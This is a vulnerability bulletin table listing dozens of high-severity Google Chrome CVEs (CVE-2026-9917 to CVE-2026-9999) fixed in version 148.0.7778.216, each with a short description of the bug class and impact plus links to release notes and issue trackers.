| Google--Chrome | Uninitialized Use in WebGL in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9917 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500095304 |
| Google--Chrome | Inappropriate implementation in Tint in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9918 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500099471 |
| Google--Chrome | Out of bounds read in WebGL in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9919 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500114058 |
| Google--Chrome | Uninitialized Use in GPU in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9920 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500138014 |
| Google--Chrome | Uninitialized Use in WebGL in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin information via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9921 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500150338 |
| Google--Chrome | Use after free in GPU in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9922 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500187083 |
| Google--Chrome | Use after free in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9923 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500393328 |
| Google--Chrome | Heap buffer overflow in ANGLE in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9924 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500398345 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9925 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500536458 |
| Google--Chrome | Heap buffer overflow in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9926 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500540748 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9927 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500540958 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9928 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/501125002 |
| Google--Chrome | Inappropriate implementation in WebGL in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9929 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/501367791 |
| Google--Chrome | Out of bounds write in Dawn in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9930 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/501499832 |
| Google--Chrome | Use after free in GPU in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9931 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/501524262 |
| Google--Chrome | Use after free in ANGLE in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9932 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/501563323 |
| Google--Chrome | Use after free in Input in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9933 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/501575979 |
| Google--Chrome | Use after free in Aura in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9934 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/501576946 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9935 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/501584689 |
| Google--Chrome | Use after free in GFX in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9936 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/502104354 |
| Google--Chrome | Use after free in UI in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9937 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/502112506 |
| Google--Chrome | Inappropriate implementation in V8 in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9938 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/502300817 |
| Google--Chrome | Heap buffer overflow in WebCodecs in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9939 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/502735235 |
| Google--Chrome | Heap buffer overflow in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9940 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/502738003 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9941 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/502812366 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9942 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503438092 |
| Google--Chrome | Out of bounds read in WebGL in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9943 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503464551 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9944 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503471286 |
| Google--Chrome | Use after free in Media in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9945 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503565293 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9946 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503596863 |
| Google--Chrome | Use after free in XML in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9947 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503627446 |
| Google--Chrome | Use after free in Views in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9948 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503790201 |
| Google--Chrome | Use after free in Core in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9949 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503793153 |
| Google--Chrome | Insufficient validation of untrusted input in iOS in Google Chrome on iOS prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9950 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503862359 |
| Google--Chrome | Use after free in UI in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9951 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503873388 |
| Google--Chrome | Use after free in WebAudio in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9952 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503929476 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9953 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503985322 |
| Google--Chrome | Use after free in TabStrip in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9954 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504175497 |
| Google--Chrome | Inappropriate implementation in iOS in Google Chrome on iOS prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9955 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504184408 |
| Google--Chrome | Use after free in iOS in Google Chrome on iOS prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9956 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504195132 |
| Google--Chrome | Use after free in PDF in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9957 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504516117 |
| Google--Chrome | Use after free in PDFium in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9958 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504555886 |
| Google--Chrome | Race in WebRTC in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9959 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504557432 |
| Google--Chrome | Integer overflow in PDFium in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted font file. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9960 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504573260 |
| Google--Chrome | Use after free in SurfaceCapture in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9961 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504710769 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9962 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504716948 |
| Google--Chrome | Uninitialized Use in iOS in Google Chrome on iOS prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9963 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/505143241 |
| Google--Chrome | Use after free in Bluetooth in Google Chrome on Mac prior to 148.0.7778.216 allowed an attacker who convinced a user to install a malicious extension to execute arbitrary code via a crafted Chrome Extension. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9964 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/505190999 |
| Google--Chrome | Out of bounds write in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9965 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/506377574 |
| Google--Chrome | Integer overflow in XML in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9966 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/506388321 |
| Google--Chrome | Out of bounds write in GPU in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9967 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/506414791 |
| Google--Chrome | Integer overflow in V8 in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9968 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/506499280 |
| Google--Chrome | Insufficient validation of untrusted input in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9969 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/506550494 |
| Google--Chrome | Use after free in WebGL in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9970 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/506653647 |
| Google--Chrome | Inappropriate implementation in iOS in Google Chrome on iOS prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9971 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/508448586 |
| Google--Chrome | Uninitialized Use in Gamepad in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9972 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/508463705 |
| Google--Chrome | Out of bounds write in V8 in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9973 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/509268941 |
| Google--Chrome | Out of bounds write in GPU in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9974 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511710468 |
| Google--Chrome | Out of bounds read and write in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9975 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511719039 |
| Google--Chrome | Inappropriate implementation in USB in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9976 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511732828 |
| Google--Chrome | Insufficient validation of untrusted input in WebShare in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9977 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511741173 |
| Google--Chrome | Use after free in Glic in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9978 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511741396 |
| Google--Chrome | Insufficient validation of untrusted input in Input in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9979 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511742228 |
| Google--Chrome | Insufficient validation of untrusted input in Printing in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9980 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511776372 |
| Google--Chrome | Inappropriate implementation in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9981 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/512995705 |
| Google--Chrome | Insufficient validation of untrusted input in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9982 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513001247 |
| Google--Chrome | Type Confusion in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9983 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513001309 |
| Google--Chrome | Use after free in UI in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9984 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513002543 |
| Google--Chrome | Insufficient validation of untrusted input in Media in Google Chrome on ChromeOS prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9985 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513019760 |
| Google--Chrome | Insufficient validation of untrusted input in OptimizationGuide in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9986 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513028160 |
| Google--Chrome | Insufficient validation of untrusted input in WebAppInstalls in Google Chrome on Android prior to 148.0.7778.216 allowed a local attacker to execute arbitrary code via a malicious file. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9987 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513046475 |
| Google--Chrome | Use after free in WebRTC in Google Chrome on Linux prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9988 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513049286 |
| Google--Chrome | Inappropriate implementation in Media in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to bypass same origin policy via a crafted video file. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9989 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513054053 |
| Google--Chrome | Use after free in WebAppInstalls in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9990 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513128608 |
| Google--Chrome | Inappropriate implementation in Media in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9991 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513173565 |
| Google--Chrome | Use after free in Network in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9992 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513177826 |
| Google--Chrome | Use after free in Views in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted PDF file. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9993 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513208588 |
| Google--Chrome | Use after free in Core in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9994 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513235131 |
| Google--Chrome | Use after free in WebXR in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9995 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513256572 |
| Google--Chrome | Out of bounds read in WebRTC in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9996 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513268100 |
| Google--Chrome | Use after free in Input in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9997 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513324041 |
| Google--Chrome | Integer overflow in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9998 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513337118 |
| Google--Chrome | Inappropriate implementation in ANGLE in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9999 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513364480 |
